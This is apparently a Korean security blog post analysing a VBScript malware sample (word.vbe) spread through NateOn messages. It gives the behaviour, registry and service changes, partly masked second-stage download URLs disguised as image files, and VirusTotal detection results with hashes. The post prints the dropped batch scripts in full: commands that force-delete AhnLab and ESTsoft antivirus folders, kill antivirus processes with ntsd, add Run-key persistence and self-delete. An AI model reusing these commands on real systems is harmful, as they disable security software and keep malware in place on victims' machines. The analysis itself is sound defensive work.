네이트온 쪽지로 이상한 URL이 왔다고 알아봐 달라는 질문 이었다.
바로 URL로 들어가니 어떠한 파일을 다운받는 링크가 나왔고 다운 받으니 word.vbe라는 VB Script 파일이었다.
네이트온 쪽지로 왔으니 악성코드가 맞는 것은 100% 일 것!!
하지만, 그때는 공부중이어서 분석을 하지 못했고, 오늘에서야 분석을 하게 되었다.
분석시간이 너무 걸려 중간에 그만 뒀지만 그래도 공부는 됬을거라 생각 된다.
바이러스 토탈에서 이 악성코드를 탐지하는 AV는 4개정도밖에 없었다.
일단 해당 악성코드를 실행하면 아래와 같은 동작을 한다.
처음에는 분석환경이 실행조건에 맞지 않아서 그런 줄 알았으나, 알고보니 파일들이 0바이트 였다...
아무런 코드도 없는 쓰레기 파일들이었다.
그리고 PE로 프로세스를 보니 ping 프로세스가 실행되어 있었다. 자세히 보니 루프백으로 ping을 10개 날리고 있었다.
그 다음으로는 아무런 동작도 하지 않는 것처럼 조용하다.... 그러나 프로그램은 아래와 같은 파일들을 생성한다.
[생성파일]
C:\WINDOWS\help\wincari.exe // 쓰레기 파일
C:\time.txt // 로컬컴퓨터의 날짜와 시간을 저장하는 텍스트 파일
C:\WINDOWS\Web\ver.exe // 쓰레기 파일
C:\WINDOWS\system32\winfacet.exe // 쓰레기 파일
C:\WINDOWS\system32\Alcrm32.exe // 확인 불가...
C:\WINDOWS\v.bat // 쓰레기 파일들을 실행시키는 등에 행위를 하는 배치파일
C:\WINDOWS\va.bat // 알약AV와 V3AV를 디버깅 하도록 명령을 내리는 배치파일
아래는 위에서 생성된 v.bat 파일과 va.bat 파일의 내용이다.
[v.bat]
%systemroot%\Web\ver.exe // ver.exe 실행
%systemroot%\system32\winfacet.exe // winfacet.exe 실행
del "%ProgramFiles%\ESTsoft\*.*" /f /s /q // ESTosft 하위 폴더와 파일 모두 강제 삭제
del "%ProgramFiles%\AhnLab\*.*" /f /s /q // AhnLab 하위 폴더와 파일 모두 강제 삭제
ping 127.0.0.1 -n 10>nul // 화면에 보이지 않게 nul로 출력
reg add HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN /v MyRun /d %systemroot%\system32\Alcrm32.exe /f // 레지스트리에 Alcrm32.exe 등록
date <c:\time.txt
del c:\time.txt
del %systemroot%\v.bat // 모든 작업을 끝마치고 자신을 삭제
===============================================================================================================
[va.bat]
tasklist | findstr "V3LSvc.exe" && ntsd -c q -pn V3LSvc.exe // V3 프로세스르 찾은 뒤 디버깅
tasklist | findstr "V3LSvc.exe" && ntsd -c q -pn V3LSvc.exe
tasklist | findstr "AYServiceNT.aye" && ntsd -c q -pn AYServiceNT.aye // 알약 프로세스를 찾은 뒤 디버깅
해당 악성코드는 아래와 같은 레지스트리 변경작업을 실행한다.
[레지스트리 변경 항목]
HKLM\SYSTEM\CurrentControlSet\Service\SharedAccess\Start
old value : 2
New Value : 3
HKLM\SYSTEM\CurrentControlSet\Service\SharedAccess\Epoch\Epoch
Old Value : 32
New Value : 33
HKLM\SYSTEM\ControlSet001\Service\SharedAccess\Start
Old Value : 2
New Value : 3
HKLM\SYSTEM\ControlSet001\Service\SharedAccess\Epoch\Epoch
Old Value : 32
New Value : 33
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\S-1-5-19\RefCount
Old Value : 2
New Value : 1
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Run
Old Value : 5
New Value : 7
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Run\ver.exe
실행결과 : ver.exe 레지스트리 등록
HKLM\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\Run\MyRunC:\WINDOWS\system32\Alcrm32.exe 실행결과 : Alcrm32.exe 레지스트리 등록
HKLM\SOFTWARE\Microsoft\WBEM\CIMON
Old Value : 44
New Value : 47
HKLM\SOFTWARE\Microsoft\WBEM\CIMONHKLM\SOFTWARE\Microsoft\WBEM\CIMON\Merger Throttling Threshold
실행결과 : Merger Throttling Threshold 생성 후 value 10으로 설정
HKLM\SOFTWARE\Microsoft\WBEM\CIMON\Merger Release Threshold
실행결과 : Merger Release Threshold 생성 후 value 5로 설정
HKLM\SOFTWARE\Microsoft\WBEM\CIMON\Merger Batching Threshold 생성 후 value 131072로 설정
실행결과 : Merger Batching Threshold 생성 후 value 131072로 설정
HKLM\SOFTWARE\Microsoft\Rpc\UuidSequenceNumber
Old Value : -522910999
New Value : -522910998
HKLM\SOFTWARE\Microsoft\Cryptography\RNG\Seed value 수정
실행결과 : Seed Value 수정
해당 악성코드는 아래와 같이 서비스도 수정한다.
[Drirver]
IP Network Address Translator(NAT) 기능 Stop // NAT 기능 OFF
Microsoft Kernel Wave Audio Mixer 기능 Stop
[Win32]
Application Layer Gateway Service 기능 Stop // OSI 7계층 서비스 게이트웨이 서비스 OFF
Windows Firewall/Internet Connection Sharing(ICS) 기능 Stop // 방화벽, 공유 기능 OFF
이 모든 행동과 함께 인터넷이 연결되어 있다면 아래와 같이 특정 사이트에서 파일을 다운로드 한다.
[악성파일 추가 다운로드 - 아직도 다운로드가 가능하므로 주소는 모두 공개 하지 않음]
jrcrxxxx.co.kr(211.xxx.111.xxx) /%69%6D%61%67%65%73/%62%61%6E%6E%65%72/%6C%6F%67%6F%73%77%69%73%68.%6A%70%67 (/images/banner/logoswish.jpg)
www.heavexxxx.co.kr(116.xxx.158.xxx) /%73%68%6F%70/%69%6D%67/%6D%61%69%6E/%6C%6F%67%6F%30%39.%67%69%66 (/shop/img/main/logo09.gif)
jjknew.firsxxxxx.kr(121.xxx.114.xxx) /%70%61%72%74%6E%65%72/%65%73%65%6C%6C%65%72%73/%74%6D%70/%32%30%30%38%31%30%30%32%31%36%34%38%62%39%39.%67%69%66 (/partner/esellers/tmp/200810021648b99.gif)
패킷을 캡쳐해서 보면 URL 인코딩으로 되어 있는데 그것을 복호화하면 ()안에 주소가 나온다.
하지만 내 노트북에서는 노튼이 알아서 다 처리해주어... backtrack5에서 wget으로 수동으로 다운로드 하였다.
이미지에서 볼수 있듯이 받는 파일들은 확장자만 이미지파일 확장자 일뿐, 실제로는 윈도우 exe 파일들이다.
어떠한 악위적인 행위를 하는지는 분석을 여기서 중단하여 모른다.(다시 이 파일들을 분석 환경으로 옴기고 등등을 하기가 너무 귀찮네요... ㅠㅠ)
한시라도 빨리 모든 백신에 치료패턴이 추가 되었으면 한다.
[+] 해당 악성코드 샘플을 얻고 싶으신 백신업체 관계자 분들은 연락주시면 바로 쏴드립니다. ^^
(2011. 12. 14 추가) - 바이러스 토탈 결과
| Antivirus | Version | Last Update | Result |
|---|---|---|---|
| AhnLab-V3 | 2011.12.12.00 | 2011.12.12 | - |
| AntiVir | 7.11.19.98 | 2011.12.13 | - |
| Antiy-AVL | 2.0.3.7 | 2011.12.13 | - |
| Avast | 6.0.1289.0 | 2011.12.13 | VBS:Agent-MC [Trj] |
| AVG | 10.0.0.1190 | 2011.12.13 | JS/Heur |
| BitDefender | 7.2 | 2011.12.14 | - |
| ByteHero | 1.0.0.1 | 2011.12.07 | - |
| CAT-QuickHeal | 12.00 | 2011.12.13 | - |
| ClamAV | 0.97.3.0 | 2011.12.13 | - |
| Commtouch | 5.3.2.6 | 2011.12.13 | - |
| Comodo | 10947 | 2011.12.14 | UnclassifiedMalware |
| DrWeb | 5.0.2.03300 | 2011.12.13 | - |
| Emsisoft | 5.1.0.11 | 2011.12.13 | Virus.JS.Heur!IK |
| eSafe | 7.0.17.0 | 2011.12.13 | - |
| eTrust-Vet | 37.0.9622 | 2011.12.13 | - |
| F-Prot | 4.6.5.141 | 2011.12.13 | - |
| F-Secure | 9.0.16440.0 | 2011.12.13 | - |
| Fortinet | 4.3.388.0 | 2011.12.13 | - |
| GData | 22 | 2011.12.13 | VBS:Agent-MC |
| Ikarus | T3.1.1.109.0 | 2011.12.13 | Virus.JS.Heur |
| Jiangmin | 13.0.900 | 2011.12.13 | - |
| K7AntiVirus | 9.119.5671 | 2011.12.13 | - |
| Kaspersky | 9.0.0.837 | 2011.12.13 | HEUR:Exploit.Script.Generic |
| McAfee | 5.400.0.1158 | 2011.12.13 | - |
| McAfee-GW-Edition | 2010.1E | 2011.12.13 | - |
| Microsoft | 1.7903 | 2011.12.13 | - |
| NOD32 | 6709 | 2011.12.13 | - |
| Norman | 6.07.13 | 2011.12.13 | - |
| nProtect | 2011-12-13.01 | 2011.12.13 | - |
| Panda | 10.0.3.5 | 2011.12.13 | - |
| PCTools | 8.0.0.5 | 2011.12.14 | - |
| Prevx | 3.0 | 2011.12.14 | - |
| Rising | 23.88.01.02 | 2011.12.13 | - |
| Sophos | 4.72.0 | 2011.12.13 | - |
| SUPERAntiSpyware | 4.40.0.1006 | 2011.12.14 | - |
| Symantec | 20111.2.0.82 | 2011.12.14 | - |
| TheHacker | 6.7.0.1.356 | 2011.12.11 | - |
| TrendMicro | 9.500.0.1008 | 2011.12.13 | - |
| TrendMicro-HouseCall | 9.500.0.1008 | 2011.12.14 | - |
| VBA32 | 3.12.16.4 | 2011.12.13 | - |
| VIPRE | 11249 | 2011.12.14 | - |
| ViRobot | 2011.12.13.4823 | 2011.12.13 | - |
| VirusBuster | 14.1.114.0 | 2011.12.13 | - |
Additional information
|
|---|
| MD5 : 136014f57b25249e60fb4ce1dc74e1dc |
| SHA1 : 4efec04d655b3c641c2cd21525175549395e1e1a |
| SHA256: b95635c202835fffea89c28f20d15eb94770b5b041d201439ff4f9ebf7e591fa |
| ssdeep: 96:f7BCqrj4UWUzDqNfY9RynI7I/7qTRzPYyCtZ01TkCGfhwHYBIIJPC80u6u:TAqrGsGYvoI7E 76zVOjWYBIIPC8X |
| File size : 4862 bytes |
| First seen: 2011-12-11 08:24:20 |
| Last seen : 2011-12-13 23:47:16 |
'[+] Security > [-] Analysis' 카테고리의 다른 글
| Android Malware Analysis(HippoSMS) (0) | 2012.02.18 |
|---|---|
| 악성코드(word.vbe) 간단한 추가 분석 (2) | 2011.12.14 |
| 스팸메일을 뜯어보자! (0) | 2011.11.16 |
| 네이트온 쪽지 악성코드 분석(Player.exe) (4) | 2011.11.14 |
